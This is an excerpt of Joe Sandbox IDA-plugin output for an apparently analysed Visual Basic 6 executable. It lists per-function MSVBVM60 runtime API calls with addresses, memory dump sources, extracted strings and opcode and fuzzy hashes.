                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,00000000,Function_000032B6), ref: 0041F2DE
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041F30E
                                                                                    • #717.MSVBVM60(?,00004008,00000040,00000000), ref: 0041F33D
                                                                                    • __vbaStrVarMove.MSVBVM60(?), ref: 0041F347
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041F352
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 0041F35B
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0041F38A
                                                                                    • #717.MSVBVM60(?,00004008,00000040,00000000), ref: 0041F3B9
                                                                                    • __vbaStrVarMove.MSVBVM60(?), ref: 0041F3C3
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041F3CE
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0041F3D9
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041F3E2
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 0041F3EB
                                                                                    • __vbaStrCat.MSVBVM60(00000000,Remark for ), ref: 0041F411
                                                                                    • #717.MSVBVM60(?,00000008,00000040,00000000), ref: 0041F430
                                                                                    • __vbaStrVarMove.MSVBVM60(?), ref: 0041F43D
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041F448
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0041F453
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041F45C
                                                                                    • __vbaFreeVarList.MSVBVM60(00000002,00000008,?), ref: 0041F46F
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,00000000), ref: 0041F4CF
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,00000000), ref: 0041F4DD
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?), ref: 0041F4EB
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041F4F4
                                                                                    • __vbaRecUniToAnsi.MSVBVM60(00406F68,?,?,?), ref: 0041F515
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,00000002,00000000), ref: 0041F525
                                                                                    • __vbaRecAnsiToUni.MSVBVM60(00406F68,?,?), ref: 0041F53B
                                                                                    • __vbaRecDestructAnsi.MSVBVM60(00406F68,?), ref: 0041F54D
                                                                                    • __vbaRecDestructAnsi.MSVBVM60(00406F68,?,0041F5A5), ref: 0041F586
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041F58F
                                                                                    • __vbaRecDestruct.MSVBVM60(00406F68,?), ref: 0041F59E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Free$Move$Ansi$#717CopyDestructError$System$ChkstkListUnicode
                                                                                    • String ID: P$Remark for
                                                                                    • API String ID: 3958374764-404550290
                                                                                    • Opcode ID: 3836bbc5565a20a4707f8b3767ffc18a2dee7e207138df64e28d7e6c74dad988
                                                                                    • Instruction ID: 57f6e2307a2881c8932ec88b1fdace90c080974f77e0174b8cc4dbb87e3633e4
                                                                                    • Opcode Fuzzy Hash: 3836bbc5565a20a4707f8b3767ffc18a2dee7e207138df64e28d7e6c74dad988
                                                                                    • Instruction Fuzzy Hash: 2081FAB1900249EFDB14DFA0DE49BDEBBB8FB48305F108169E506BB2A0DB745A49CF54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • #594.MSVBVM60(?,660E1A08,-00000001,660E6C30), ref: 0041127A
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 00411283
                                                                                    • __vbaLenBstr.MSVBVM60 ref: 0041128F
                                                                                    • #631.MSVBVM60(?,?,0000000A), ref: 004112C8
                                                                                    • __vbaStrMove.MSVBVM60(?,?,0000000A), ref: 004112D3
                                                                                    • #516.MSVBVM60(00000000,?,?,0000000A), ref: 004112DA
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,0000000A), ref: 004112E9
                                                                                    • __vbaFreeVar.MSVBVM60(?,?,0000000A), ref: 004112F2
                                                                                    • #593.MSVBVM60(00000002,?,?,?,?,0000000A), ref: 004113D6
                                                                                    • #714.MSVBVM60(?,00000004,00000000,?,?,?,0000000A), ref: 00411464
                                                                                    • __vbaVarAdd.MSVBVM60(?,?,00000003,?,?,0000000A), ref: 0041147C
                                                                                    • __vbaI4Var.MSVBVM60(00000000,?,?,0000000A), ref: 00411483
                                                                                    • __vbaFreeVarList.MSVBVM60(00000004,00000002,00000004,?,?,?,?,0000000A), ref: 004114A0
                                                                                    • #537.MSVBVM60(?,?), ref: 004114B4
                                                                                    • __vbaStrMove.MSVBVM60(?,?), ref: 004114C5
                                                                                    • __vbaStrCat.MSVBVM60(00000000,?,?), ref: 004114C8
                                                                                    • __vbaStrMove.MSVBVM60(?,?), ref: 004114D3
                                                                                    • #537.MSVBVM60(?,00000000,?,?), ref: 004114D7
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,?,?), ref: 004114E2
                                                                                    • __vbaStrCat.MSVBVM60(00000000,?,00000000,?,?), ref: 004114EB
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,?,?), ref: 004114F2
                                                                                    • #537.MSVBVM60(00000000,00000000,?,00000000,?,?), ref: 004114F6
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,?,?), ref: 00411501
                                                                                    • __vbaStrCat.MSVBVM60(00000000,?,00000000,?,?), ref: 00411504
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,?,?), ref: 0041150B
                                                                                    • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?,?,00000000,?,?), ref: 00411523
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0041154C
                                                                                    • __vbaFreeStr.MSVBVM60(004115AE), ref: 004115A7
                                                                                    • __vbaErrorOverflow.MSVBVM60(?,?,0000000A), ref: 004115C9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$Free$#537$List$#516#593#594#631#714BstrCopyErrorOverflow
                                                                                    • String ID: gfff$gfff
                                                                                    • API String ID: 2397813863-3084402119
                                                                                    • Opcode ID: 62ef2a4d85f8eb3fe8f937d03407a8f9ec95a64fd7d0ffd1317382de30af7ef6
                                                                                    • Instruction ID: 89f21965ee05a7b64c3006bf8dd978c4399402eb5f0bddd0a045db34c415a49c
                                                                                    • Opcode Fuzzy Hash: 62ef2a4d85f8eb3fe8f937d03407a8f9ec95a64fd7d0ffd1317382de30af7ef6
                                                                                    • Instruction Fuzzy Hash: 9B9162B1E00249AFCB08DFA4DD45BDDBBFAEB88301F10412AE50AE7264EB345985CF54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,0040C87B,00000000), ref: 0041A5BE
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041A5EE
                                                                                    • __vbaAryConstruct2.MSVBVM60(?,00408078,00000003,?,?,?,00000000,Function_000032B6), ref: 0041A5FF
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041A60E
                                                                                    • __vbaSetSystemError.MSVBVM60(0000000F,00000000,?,?,?,00000000,Function_000032B6), ref: 0041A62A
                                                                                    • __vbaRecUniToAnsi.MSVBVM60(00405598,?,00000128), ref: 0041A664
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0041A67A
                                                                                    • __vbaRecAnsiToUni.MSVBVM60(00405598,00000128,?), ref: 0041A693
                                                                                    • #525.MSVBVM60(00000104), ref: 0041A6BC
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041A6C7
                                                                                    • __vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 0041A6FE
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0041A73D
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,000001F4), ref: 0041A758
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000000), ref: 0041A77E
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?,?,00000000), ref: 0041A78F
                                                                                    • __vbaFreeStr.MSVBVM60(?,00000000), ref: 0041A7A4
                                                                                    • #616.MSVBVM60(?,?,?,00000000), ref: 0041A7B9
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 0041A7C7
                                                                                    • __vbaStrMove.MSVBVM60(?,?,00000000), ref: 0041A7DE
                                                                                    • __vbaFreeStr.MSVBVM60(?,00000000), ref: 0041A7EA
                                                                                    • __vbaLenBstr.MSVBVM60(?,?,00000000), ref: 0041A7FB
                                                                                    • __vbaStrCat.MSVBVM60(?,00407CCC,?,00000001,?,00000000), ref: 0041A822
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 0041A830
                                                                                    • __vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000000), ref: 0041A83C
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 0041A84A
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000000), ref: 0041A853
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000), ref: 0041A879
                                                                                    • __vbaRecUniToAnsi.MSVBVM60(00405598,?,00000128,?,00000000), ref: 0041A8BA
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,?,00000000), ref: 0041A8D0
                                                                                    • __vbaRecAnsiToUni.MSVBVM60(00405598,00000128,?,?,00000000), ref: 0041A8E9
                                                                                    • __vbaSetSystemError.MSVBVM60(?), ref: 0041A90D
                                                                                    • __vbaFreeStr.MSVBVM60(0041A96B), ref: 0041A937
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041A94F
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041A958
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041A964
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Error$FreeSystem$AnsiMove$#525#616BoundsBstrChkstkConstruct2CopyDestructGenerateListUnicode
                                                                                    • String ID:
                                                                                    • API String ID: 1820427907-0
                                                                                    • Opcode ID: 966c6123da24b71d08ec0f7a5c1a4cfb51299011817f3b4dc7b4b5ec285d64dd
                                                                                    • Instruction ID: da6c7bdc064fde5d6e21051214ad5d77861f7fd9d568965cd9a71694eebb6c89
                                                                                    • Opcode Fuzzy Hash: 966c6123da24b71d08ec0f7a5c1a4cfb51299011817f3b4dc7b4b5ec285d64dd
                                                                                    • Instruction Fuzzy Hash: B5A11975901259DBDB14EFA0DE4DBDEB7B4FB48304F1081A9E10AB72A0DB745A84CF58
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 004193DE
                                                                                    • __vbaOnError.MSVBVM60(000000FF,00000000,?,?,00000000,Function_000032B6), ref: 0041940E
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?), ref: 00419428
                                                                                    • __vbaRedim.MSVBVM60(00000000,0000004C,?,00000000,00000001,?,00000000), ref: 00419458
                                                                                    • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,00000000,00000000), ref: 0041947D
                                                                                    • __vbaAryLock.MSVBVM60(?,?), ref: 00419495
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004194C9
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004194DA
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?), ref: 004194FA
                                                                                    • __vbaAryUnlock.MSVBVM60(00000000), ref: 00419504
                                                                                    • __vbaAryLock.MSVBVM60(?,?), ref: 00419519
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0041954D
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0041955E
                                                                                    • __vbaAryLock.MSVBVM60(00000000,?), ref: 0041956F
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004195A3
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004195B7
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?), ref: 004195E6
                                                                                    • __vbaAryUnlock.MSVBVM60(00000000), ref: 004195F0
                                                                                    • __vbaAryUnlock.MSVBVM60(00000000), ref: 004195FA
                                                                                    • __vbaAryLock.MSVBVM60(00000000,?), ref: 00419650
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,00419803), ref: 004197F0
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004197FC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Error$BoundsGenerate$Lock$SystemUnlock$DestructRedim$Chkstk
                                                                                    • String ID:
                                                                                    • API String ID: 3555954879-0
                                                                                    • Opcode ID: d7053a601a00c9baf09ed0f933eca4d89ef72334d0a3dcf76765fe079d3190a2
                                                                                    • Instruction ID: 67aec0367089ad9bdb06f85a3682bb1edb9e8b84c894a553a99a1ed1c2ada365
                                                                                    • Opcode Fuzzy Hash: d7053a601a00c9baf09ed0f933eca4d89ef72334d0a3dcf76765fe079d3190a2
                                                                                    • Instruction Fuzzy Hash: BED1E470D00208EFDB18DFA4DA98BDDBBB5BF48300F10815AE516B72A1DB74A985CF55
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,00001000,660DC410,660E1A08), ref: 00420FA3
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,00001000,660DC410,660E1A08), ref: 00420FC5
                                                                                    • __vbaI2I4.MSVBVM60(00000000,00001000,660DC410,660E1A08), ref: 00420FD2
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00420FE6
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00420FED
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00421029
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00421044
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00421056
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00421071
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004210A0
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004210C6
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0042113B
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00421149
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00421160
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0042116A
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00421181
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0042118B
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004211A2
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004211B5
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004211CE
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004211E2
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004211F5
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00421209
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00421223
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00421237
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00421250
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00421269
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00421281
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0042129F
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004212B2
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004212C6
                                                                                    • __vbaI2I4.MSVBVM60 ref: 004212CD
                                                                                    • __vbaErrorOverflow.MSVBVM60(00000000,00001000,660DC410,660E1A08), ref: 004212E7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Error$BoundsGenerate$Overflow
                                                                                    • String ID:
                                                                                    • API String ID: 2760075901-0
                                                                                    • Opcode ID: 7623d4b20da7c6b818f332ecc799d3caca9fe6e1c56e874aff0741b4b89b7b8a
                                                                                    • Instruction ID: 6f7972a480d0dd1fda114303b5166632bd8b31c6f1599b60b9e65e0100795082
                                                                                    • Opcode Fuzzy Hash: 7623d4b20da7c6b818f332ecc799d3caca9fe6e1c56e874aff0741b4b89b7b8a
                                                                                    • Instruction Fuzzy Hash: 0F81D835B00361C6C724AB98E9C65ADB3A3BFA9701FC10076D580A7271CF7998C1C7AE
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(660E6C30), ref: 00420C36
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(660E6C30), ref: 00420C51
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420C6B
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420C84
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420C9B
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420CB9
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420CD3
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420CEF
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420D0A
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420D24
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00420D2E
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420D42
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420D60
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00420D6A
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420D7E
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420D95
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420D9F
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420DB6
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420DC9
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420DE6
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420DF0
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420E07
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420E1B
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420E32
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420E3F
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420E56
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420E6A
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420E85
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420E99
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420EAE
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420EC2
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(660E6C30), ref: 00420ED8
                                                                                    • __vbaI2I4.MSVBVM60(660E6C30), ref: 00420EDF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$BoundsErrorGenerate
                                                                                    • String ID:
                                                                                    • API String ID: 3574812510-0
                                                                                    • Opcode ID: 531f9eca504aa198c6c6dfefc7d7df16526d6ddf688e9b54a0de9df055713b13
                                                                                    • Instruction ID: aa417d5a5a3cc9c21652b4fe2a9d25cfa30c058b0be9d244c1a14ba1329cb19f
                                                                                    • Opcode Fuzzy Hash: 531f9eca504aa198c6c6dfefc7d7df16526d6ddf688e9b54a0de9df055713b13
                                                                                    • Instruction Fuzzy Hash: 9E718935F1136586D724AB99E9C75ADB3E3BF88701FC11466C48123262DFB8A8C1C6DD
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaOnError.MSVBVM60(00000001,00000000,660CC33A,6600A3D7), ref: 00426796
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,00000000,?,00000000), ref: 004267C7
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000040,?,00000000), ref: 004267DF
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?,00000000,?,?,00000040,?,00000000), ref: 00426804
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000014,?,00000000,?,?,?,00000000,?,?,00000040,?,00000000), ref: 00426819
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,000000E0,?,00000000,?,?,00000014,?,00000000,?,?,?,00000000,?,?), ref: 00426834
                                                                                    • __vbaRedim.MSVBVM60(00000000,00000028,?,00000000,00000001,00000000,00000000,?,?,000000E0,?,00000000,?,?,00000014,?), ref: 00426853
                                                                                    • __vbaAryLock.MSVBVM60(?,?,?,00000000,?,?,00000040,?,00000000), ref: 00426867
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426887
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 004268A7
                                                                                    • __vbaSetSystemError.MSVBVM60(?,3F800000,?,?,00000000,?,?,00000040,?,00000000), ref: 004268D5
                                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,00000040,?,00000000), ref: 004268DE
                                                                                    • __vbaUbound.MSVBVM60(00000001,?,?,?,00000040,?,00000000), ref: 004268F8
                                                                                    • __vbaI2I4.MSVBVM60(?,?,00000040,?,00000000), ref: 00426900
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426936
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426946
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426962
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426972
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 004269A5
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 004269B5
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 004269FD
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426A0D
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426A33
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426A43
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426A69
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426A79
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426A95
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426AA2
                                                                                    • __vbaExitProc.MSVBVM60(?,?,00000040,?,00000000), ref: 00426ACD
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,00426AF5), ref: 00426AEE
                                                                                    • __vbaErrorOverflow.MSVBVM60(?,00000000,?,?,00000040,?,00000000), ref: 00426B0B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Error$BoundsGenerate$System$DestructExitLockOverflowProcRedimUboundUnlock
                                                                                    • String ID:
                                                                                    • API String ID: 2234381736-0
                                                                                    • Opcode ID: 8a3a9e375456d3784734aa077d45e81f9f694a82a56cb0dbdfd646f6f7379c76
                                                                                    • Instruction ID: 8bb1792076bedc514fb8fc9f35066fd02f5cb142c2b8cf4fa96dc0b38f9b19a4
                                                                                    • Opcode Fuzzy Hash: 8a3a9e375456d3784734aa077d45e81f9f694a82a56cb0dbdfd646f6f7379c76
